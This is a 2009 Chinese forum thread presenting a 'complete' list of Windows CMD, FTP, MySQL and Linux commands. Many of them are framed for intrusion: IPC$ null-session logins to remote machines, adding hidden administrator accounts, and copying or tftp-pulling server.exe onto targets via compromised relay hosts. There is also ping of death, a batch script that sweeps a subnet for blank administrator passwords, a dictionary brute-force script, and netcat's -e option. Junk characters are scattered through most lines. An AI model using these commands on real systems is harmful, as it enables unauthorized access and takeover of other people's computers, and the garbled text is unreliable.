下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2945|回复: 9
打印 上一主题 下一主题

CMD命令大全

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-5-4 09:32:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    一:
    , X& w" [+ c" Qnet use ipipc$ " " /user:" " 建立IPC空链接0 r# o) \0 ]3 Z" z7 x' g' F4 i( h
    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
    7 M6 A+ d; b) n2 T, d) r8 ^net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:% _5 ]7 i; `1 U
    net use h: ipc$ 登陆后映射对方C:到本地为H:
    ) e* |7 w% z7 b9 O5 Rnet use ipipc$ /del 删除IPC链接
    # Z( `% c. d5 u6 o0 nnet use h: /del 删除映射对方到本地的为H:的映射& ~* x0 b8 ]! v
    net user 用户名 密码 /add 建立用户
    ; I4 b! ]$ w/ M) `4 y! j! r, Gnet user guest /active:yes 激活guest用户4 \4 n7 |% g1 y1 `5 w
    net user 查看有哪些用户. o4 R! p6 {& T- \3 h3 m
    net user 帐户名 查看帐户的属性
    " K* Y& M7 g  ?7 k; b0 tnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
    2 W2 d' ~" P$ b" h' j/ p. Enet start 查看开启了哪些服务0 r" s# j& Q2 g9 ~* v0 ?) a
    net start 服务名  开启服务;(如:net start telnet, net start schedule)
    3 m! O+ l# Q3 p# Y) K, `. `$ @net stop 服务名 停止某服务* E2 t1 ]( Q9 T! S6 F
    net time 目标ip 查看对方时间* |  n; j4 s7 e6 m( q5 e, O
    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息5 p5 N4 ?& X) f5 X' r& {$ Z
    net view 查看本地局域网内开启了哪些共享
    1 Q7 s$ B6 \+ E; o/ z4 Jnet view ip 查看对方局域网内开启了哪些共享
    & R  m- \8 U( {- o4 D: Inet config 显示系统网络设置/ z- C% ?# [* @1 r
    net logoff 断开连接的共享
    4 U. m( c7 s* A; Gnet pause 服务名 暂停某服务
    7 U7 r2 ]( N* }7 r9 k% T% Ynet send ip "文本信息" 向对方发信息, C* E* A, f, z, G
    net ver 局域网内正在使用的网络连接类型和信息4 r6 H. M9 S9 i4 M; M" F
    net share 查看本地开启的共享
    " U5 T% p, |$ W* ^6 Snet share ipc$ 开启ipc$共享
    1 [% M5 D/ K  V0 ?7 U2 onet share ipc$ /del 删除ipc$共享  Q9 K& S+ j6 b; i
    net share c$ /del 删除C:共享
    ' T* n4 I$ p8 L' |' M5 r9 b: v/ Enet user guest 12345 用guest用户登陆后用将密码改为12345$ N  `; c: g/ n* j
    net password 密码 更改系统登陆密码
    ; F1 f) b+ z6 v' A: k2 y+ X$ f8 `2 qnetstat -a 查看开启了哪些端口,常用netstat -an
    - o( n" Q) U7 }7 u" ?: g: snetstat -n 查看端口的网络连接情况,常用netstat -an
    * \$ [" ~0 j: [( S+ k- M  y. rnetstat -v 查看正在进行的工作
    , r$ g2 z' W6 t. w+ Anetstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
    1 D5 u( u. i$ ~$ P  L3 O2 v+ nnetstat -s 查看正在使用的所有协议使用情况9 |$ _6 @$ N0 b8 K
    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写, Q* u7 y: c8 ^( `& f, r: E
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    5 ?" @5 h! f5 g" Rping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。" H' J1 ?/ a  F6 P
    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    0 P! L* y) g3 _% A6 ^. oipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息* \3 `& }3 j, s1 G5 N/ L
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)) j3 g' D  x2 Y, T
    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)8 x( g+ j3 b8 _4 t0 [. S% @
    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件/ h* R7 L2 g1 t7 R; R
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-5-4 09:33:01 | 只看该作者
    二:
    . v  z# m& [7 Rdel /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)* d8 [- n# l; L! o+ z& e" D
    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    ) A1 @- s; p8 a) X7 E6 H5 e1 D4 ffc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令; W% \) o5 ~3 |9 [: t
    at id号 开启已注册的某个计划任务
    2 j2 X% {2 i+ Y% g+ B: h" l& N- Kat /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止) }( o, a' {. T* p# R) V
    at id号 /delete 停止某个已注册的计划任务# o" D, P' M% Z( s
    at 查看所有的计划任务  Y6 C! o/ D3 K! ?
    at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机, h2 @. B& `8 y
    finger username @host 查看最近有哪些用户登陆
    0 N9 v- {6 {2 o; Ctelnet ip 端口 远和登陆服务器,默认端口为23" Q* M, y1 z& G0 R
    open ip 连接到IP(属telnet登陆后的命令)
    : R! w9 V. g) j+ T* Htelnet 在本机上直接键入telnet 将进入本机的telnet
    ; i8 O. n7 ~% W' }copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件" W/ c: P0 V- S/ Y
    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
    + `7 N+ c2 d0 f( r; e0 ^5 ]cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    2 }, r& F. b9 A. O5 r7 ycopy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
    8 A3 k. V5 C( C4 c& Vxcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件* k! S7 @" a+ e0 y) S$ [
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    ! o- G3 }5 {. B1 x: A# Btftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
    3 `8 Z2 [  K( a/ Eftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)3 e: Y8 h3 _, z
    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    5 _2 p" p! I) o8 H7 i9 Karp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
    5 R! o9 l) v; I) ?4 b6 dstart 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
      i% S7 i* [' Z3 Kmem 查看cpu使用情况
    7 X; j& r/ ~* {; Eattrib 文件名(目录名) 查看某文件(目录)的属性0 z; E5 l# G- b
    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性6 X" _9 @3 }& k5 Y
    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间6 @5 W/ w6 a  J0 j1 k; U
    date /t 、 time /t 使用此参数即“DATE/T
    5 l. }( a. J. J0 |* y$ {8 a”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间2 w+ r* e; L6 j0 u) _6 R& A
    set 指定环境变量名称=要指派给变量的字符 设置环境变量
    5 L' A9 T. u8 A& B( uset 显示当前所有的环境变量2 J1 g, s2 i9 @! T# F
    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量' I! Z( N% I/ C' Q9 M' ~
    pause 暂停批处理程序,并显示出:请按任意键继续....1 b; A6 x2 w- C
    if 在批处理程序中执行条件处理(更多说明见if命令及变量)0 @+ J* ], I; ^
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)% ]- x7 B# P1 j5 _3 r$ m. ~
    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
    . y0 D/ ?- f/ X' z; x5 ?for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)3 {$ F& G+ l; }6 p, V
    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
    ; K1 ]) l+ Y% l1 h+ |6 [8 kecho 信息 在屏幕上显示出信息
    & @- |+ G  [  R4 _! h( U7 C- eecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中: Y; \2 N% t; p- H% E
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
    - l- s$ g# \0 ~6 {find 文件名 查找某文件* b9 e! }/ F8 i+ o1 m
    title 标题名字 更改CMD窗口标题名字
    6 M  s5 g' {$ Ocolor 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
    6 K0 v% k: H7 Dprompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )7 u6 ?# u/ U/ E4 `
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    3
     楼主| 发表于 2009-5-4 09:33:35 | 只看该作者
    三:
    ( ^5 r5 C# r# g( f( A$ ?8 xver 在DOS窗口下显示版本信息' ]7 f! M; N. C  Z, m
    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
    ; {( Y- M  a0 A% x9 g2 w; F# O6 hformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS7 g, `; O' O3 J" _  l
    md 目录名 创建目录: v. h9 X1 N& X+ r( X. O
    replace 源文件 要替换文件的目录 替换文件4 N) F. R/ t7 v  z, g
    ren 原文件名 新文件名 重命名文件名, X; {: o" x$ v- _8 i# t- [5 |0 b
    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称7 q! s" Q1 [, C0 U* x) f3 [$ v
    type 文件名 显示文本文件的内容
    3 x! i& O- d, l+ l9 q( H5 c' [; Zmore 文件名 逐屏显示输出文件
    5 R/ m( S  d* g, Vdoskey 要锁定的命令=字符/ |1 _1 w- J0 W6 `/ d3 \8 M
    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
    ' s+ N9 \7 |# J( I5 Qtaskmgr 调出任务管理器2 u; k& {' n# @; \
    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误8 a" P7 L/ K+ l) R" c$ l
    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口) k; e, d8 y) v4 v$ f6 X
    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
    & t/ V) z1 T" \* F+ P& H( H: d) y. Jpath 路径可执行文件的文件名 为可执行文件设置一个路径。
    4 C# K9 K7 ~% J( S; `( Ocmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
    / U3 r1 I4 ^$ R9 M0 Tregedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;) O) T4 `4 }  b( W
    regedit /e 注册表文件名 导出注册表
    : G$ R) U- W3 F: @/ Y/ r, A6 rcacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。
      W' W2 q- f# G, Scacls 文件名 查看文件的访问用户权限列表
    * b6 y& q9 c- l4 K5 ~) ^REM 文本内容 在批处理文件中添加注解- A' z2 f- C9 E) ~/ {: [* i
    netsh 查看或更改本地网络配置情况) k: d, J: S; P# n
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    4
     楼主| 发表于 2009-5-4 09:35:09 | 只看该作者
    四:: l% f4 L1 L+ b0 N
    IIS服务命令:
    . O, M$ l' Q6 c0 ~) Y& V! U3 xiisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)7 N* o' U( A. j7 R
    iisreset /start或stop 启动(停止)所有Internet服务* Y+ Y0 p) m& Z1 ]
    iisreset /restart 停止然后重新启动所有Internet服务
    ! w! I1 Z5 C8 ]9 Liisreset /status 显示所有Internet服务状态
    8 ]% B1 ?  E5 w7 Q2 Niisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
    + A8 X- P- a2 }iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机1 }4 E, n4 E4 d" {6 v
    iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
    ( F, F: g9 Q4 w, r) |iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
    # L1 c7 x$ a8 X3 T( t/ fFTP 命令: (后面有详细说明内容)7 {& n, n3 a! {; a- X. ]) \
    ftp的命令行格式为:
    . G. p. T' h. h+ |ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。! j' b' h- H: h
    -d 使用调试方式。1 a+ y. x5 R+ _3 W5 k9 J
    -n 限制ftp的自动登录,即不使用.netrc文件。1 Z1 U, W) `4 ^# a8 H' B: ^( _
    -g 取消全局文件名。
    3 o0 |9 }/ f! K& Qhelp [命令] 或 ?[命令] 查看命令说明# i' B* U$ ^" r
    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
    9 }, r9 q) e0 \( P0 P  {" ^pwd 列出当前远端主机目录
    0 y1 L' Z$ `5 vput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中% D& ~' Z: L/ v, A* X6 U2 A, D: ]
    get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中& a7 l! F- a4 O* \7 B% g6 l4 U
    mget [remote-files] 从远端主机接收一批文件至本地主机3 v, g' i; w  C. w& `
    mput local-files 将本地主机中一批文件传送至远端主机) M. R$ R6 Q$ D8 _
    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
    - G& ?6 b0 n8 h6 f$ D9 qascii 设定以ASCII方式传送文件(缺省值)! |+ |. A) _: R+ u) [3 j- C  T
    bin 或 image 设定以二进制方式传送文件
    , b0 c+ \0 O6 O2 d6 X) Zbell 每完成一次文件传送,报警提示
    $ @( W6 L: e) B8 h6 V8 F% z( wcdup 返回上一级目录
    . n5 H6 n) j8 w" ], ?9 R0 Nclose 中断与远程服务器的ftp会话(与open对应)9 ^) x; I, ]! L, [3 h
    open host[port] 建立指定ftp服务器连接,可指定连接端口
    3 m1 ?4 u" p- C, {+ V8 i) Mdelete 删除远端主机中的文件
    ' _+ `1 G# Q: M  {) n9 l8 emdelete [remote-files] 删除一批文件3 a% {( [! \/ G/ v1 b% \
    mkdir directory-name 在远端主机中建立目录5 J4 n% ?& ?$ n
    rename [from] [to] 改变远端主机中的文件名% d/ ~! _& Z9 z5 M$ e% ~, L
    rmdir directory-name 删除远端主机中的目录
    ; _9 R3 t- k5 v" pstatus 显示当前FTP的状态
    $ F! v7 b- U8 t6 J  Asystem 显示远端主机系统类型
    6 j+ c, h5 `! a$ nuser user-name [password] [account] 重新以别的用户名登录远端主机, h+ B, J1 D9 c/ q9 j
    open host [port] 重新建立一个新的连接
    8 z8 L! |, l' Z/ Aprompt 交互提示模式
    0 k) C9 p: Y$ w1 W& v: gmacdef 定义宏命令
    + b6 `5 G+ C! j- g7 elcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
    ! _, `$ v; z7 z3 E! uchmod 改变远端主机的文件权限( ]: V  V4 D" A/ i. }1 @' C
    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
    . F; W0 z' s$ {3 M: Wcd remote-dir 进入远程主机目录
    : a( q7 c2 o- R. D- {+ Ccdup 进入远程主机目录的父目录# |+ m% J+ V$ b
    ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    5
     楼主| 发表于 2009-5-4 09:35:42 | 只看该作者
    五:
    # E: o7 R; I& q6 WMYSQL 命令:9 B( H0 O; x5 @! x+ h& e
    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。/ s9 q4 H5 x* T! r0 t# [
    (例:mysql -h110.110.110.110 -Uroot -P1234562 [: M& c. N# R0 g& _0 G- Z
    注:u与root可以不用加空格,其它也一样)5 i/ ]! y, J. L
    exit 退出MYSQL9 D. o  P% `" X& J
    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
    5 |) X2 e, j4 [! s5 w8 Vgrant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)! U9 v. i! a, w7 q
    show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
    ( p! R/ D3 ^! q* `use mysql;* u% t9 W2 f: f+ J
    show tables; 显示库中的数据表; s3 A$ Z9 _: V
    describe 表名; 显示数据表的结构% P6 l' U2 \. q! ~+ d. [4 S
    create database 库名; 建库
    0 U; j! c$ e& P9 Suse 库名;
    8 u) m' Z% n* g) I  B& {6 Fcreate table 表名 (字段设定列表); 建表( O- r! \4 J1 T1 s: {4 t# s+ v
    drop database 库名;
    1 P4 l: S$ x- h, t; U$ adrop table 表名; 删库和删表
    8 D3 n+ n9 D$ k- U/ Z& vdelete from 表名; 将表中记录清空
    5 v6 E2 y9 o8 vselect * from 表名; 显示表中的记录5 u' {) w! c# b; J% H; ^
    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。$ @  I0 c  U9 R
    win2003系统下新增命令(实用部份):1 L) _1 u3 ~$ o+ M& q3 I
    shutdown /参数 关闭或重启本地或远程主机。) U' q% Q0 _" W1 {3 \+ o7 W. Z& i
    参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
    + J. K6 k3 u5 a& I4 ^8 g( M: Z例:shutdown /r /t 0 立即重启本地主机(无延时)8 Z3 I- s1 u6 E/ o9 A; e0 C4 D
    taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
    6 t% @& |/ @; {. D- x1 d参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。) x2 [5 o5 [2 y# n
    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
    2 `# v- g2 i3 C+ C参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    6
     楼主| 发表于 2009-5-4 09:36:18 | 只看该作者
    六:3 ?# }# m7 K4 @  `
    Linux系统下基本命令: 要区分大小写1 U2 A- X9 _* Q0 _2 b# ~  W! ^
    uname 显示版本信息(同win2K的 ver)
    : `1 w$ k- d1 i2 s/ o( z2 M4 cdir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
    * Y+ }) b* g% q5 f- Xpwd 查询当前所在的目录位置
    + d. g0 c  I" e" h) c2 C1 q5 u0 ocd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
    / X+ k7 c4 [' t6 }# tcat 文件名 查看文件内容
    ! ~: m9 o& w. U$ i$ ~1 E. ?9 L% qcat >abc.txt 往abc.txt文件中写上内容。
    / Z( {5 e4 A- c+ Z4 Cmore 文件名 以一页一页的方式显示一个文本文件。9 g+ M2 p  U* y0 h
    cp 复制文件/ L7 v# M# }8 b3 A
    mv 移动文件0 z% s  z/ m7 o+ u( R
    rm 文件名 删除文件,rm -a 目录名删除目录及子目录
    $ A. u3 @- j3 {0 ]( b- Q! G* Bmkdir 目录名 建立目录
    2 s/ d7 u# r6 ^1 t% X: trmdir 删除子目录,目录内没有文档。
    + b) M' x& y% u1 Nchmod 设定档案或目录的存取权限5 {2 j0 i* m. l, ?1 V% x
    grep 在档案中查找字符串/ t" `# A9 }, _% `, B- F/ M/ E+ z0 P
    diff 档案文件比较
    - R) p- C( N7 h# U, f2 ?find 档案搜寻
    ( x' _( b6 y: d. e6 Ydate 现在的日期、时间$ N: ]9 \; I1 _$ m
    who 查询目前和你使用同一台机器的人以及Login时间地点
    ! v) e! M5 \" p1 Sw 查询目前上机者的详细资料; a1 p/ Y; A# Y& A1 x; I: D6 T
    whoami 查看自己的帐号名称
    $ n: F1 Z; ~+ F, Fgroups 查看某人的Group
    & s( C+ H% C. B+ m+ s6 Xpasswd 更改密码& X) E) h" ~- {0 ^7 m0 m
    history 查看自己下过的命令# ]% H2 S  k9 r
    ps 显示进程状态
    , |/ x7 P! h  _# d( M% \kill 停止某进程) e: U. b$ ^! \% A1 \
    gcc 黑客通常用它来编译C语言写的文件
    4 Z1 U# g5 k# k) tsu 权限转换为指定使用者
    & t% D/ D/ f8 ~7 }telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
    2 e5 F0 H( Z" Y% Aftp ftp连接上某服务器(同win2K)8 M9 q; y( h% T1 \7 p8 o, T
    附:批处理命令与变量* t% p$ Y1 e7 M  l& O( ^- o
    1:for命令及变量 基本格式:
    ) V9 [- q! f# M/ n) _FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。! e# i1 d; D- h! D2 F/ w# q! s# Q
    批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
    4 h- A6 W+ b5 E(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }0 F7 T$ F" V& M0 h
    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开  t0 y% ~0 `8 ~; [  K) [( b
    command_parameters:为特定命令指定参数或命令行开关4 N: I( l4 k7 @! q0 B8 a
    IN (set):指在(set)中取值;DO command :指执行command
    4 ~! w2 [, O# o& m参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。9 i2 i5 E4 N- ^7 O5 k7 B3 l+ f/ x+ f
    用法举例:$ H; X7 k9 r5 I/ ~* r1 h
    @echo off
    ' F  N% N7 F6 Q! X0 q) Iecho 用法格式:test.bat *.*.* > test.txt5 O2 Q2 V7 e$ q9 k2 X
    for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
    - P- W. M7 l" M) W/ z8 Z0 c存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。" \9 e+ S1 T1 D9 y3 {/ T7 v: u4 U5 Q
    /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。2 s5 C. `! m+ j8 I
    @echo off
    3 i. O4 J' A% T. V9 Necho 用法格式:ok.bat ip4 z; @' R' ^# j
    FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 2008 G5 |" O% d5 ~! Q/ y( N
    存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。% F2 d9 @& k- x4 R2 L# `
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    7
     楼主| 发表于 2009-5-4 09:36:48 | 只看该作者
    七:
    ( h& Q# h; P% A% j9 m; Y2:if命令及变量 基本格式:
    ) z/ z; }, F- }$ q5 ]5 UIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
    " f7 }/ I% [$ b6 o& ?+ V例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
    * i0 T+ s7 I+ c0 指发现并成功执行(真);1 指没有发现、没执行(假)。
    8 G' ?" T. D' Q- b# LIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
    + G8 O: _! A4 G7 ~1 A: J6 W/ F' K例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
    : b( `% M' S* ]3 i' q0 [IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。' a3 [( E: _% f7 K! ]
    例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
    5 n/ |4 G* y3 {/ t2 @IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”- R7 P2 {9 x# y
    (二)系统外部命令(均需下载相关工具):
    - {% i( u# s/ _+ O- B1、瑞士军刀:nc.exe
    5 B$ d/ ~. L$ g! e  G' u参数说明:
    5 W& r$ ^( \7 q9 d8 n-h 查看帮助信息% g$ P# z/ h8 G
    -d 后台模式) \! N  u: D- ?  j. @
    -e prog程序重定向,一但连接就执行[危险]
    - I( T* ]* o6 m-i secs延时的间隔- C$ g" C/ n4 J4 Q+ V4 M
    -l 监听模式,用于入站连接
    % O- Z% a. x+ r- g-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
    ( b# n5 b% Y) ]6 V, s4 n$ G  m-n IP地址,不能用域名
    & v/ j" q" @1 j) P3 j2 L-o film记录16进制的传输
    " v1 T! l, ?* a  P+ y7 D-p[空格]端口 本地端口号
    7 Q. v2 _# E$ m2 K7 S-r 随机本地及远程端口
    6 J  q" U, A; y0 _# w7 _-t 使用Telnet交互方式5 r, a" {" w4 E0 A* Z
    -u UDP模式
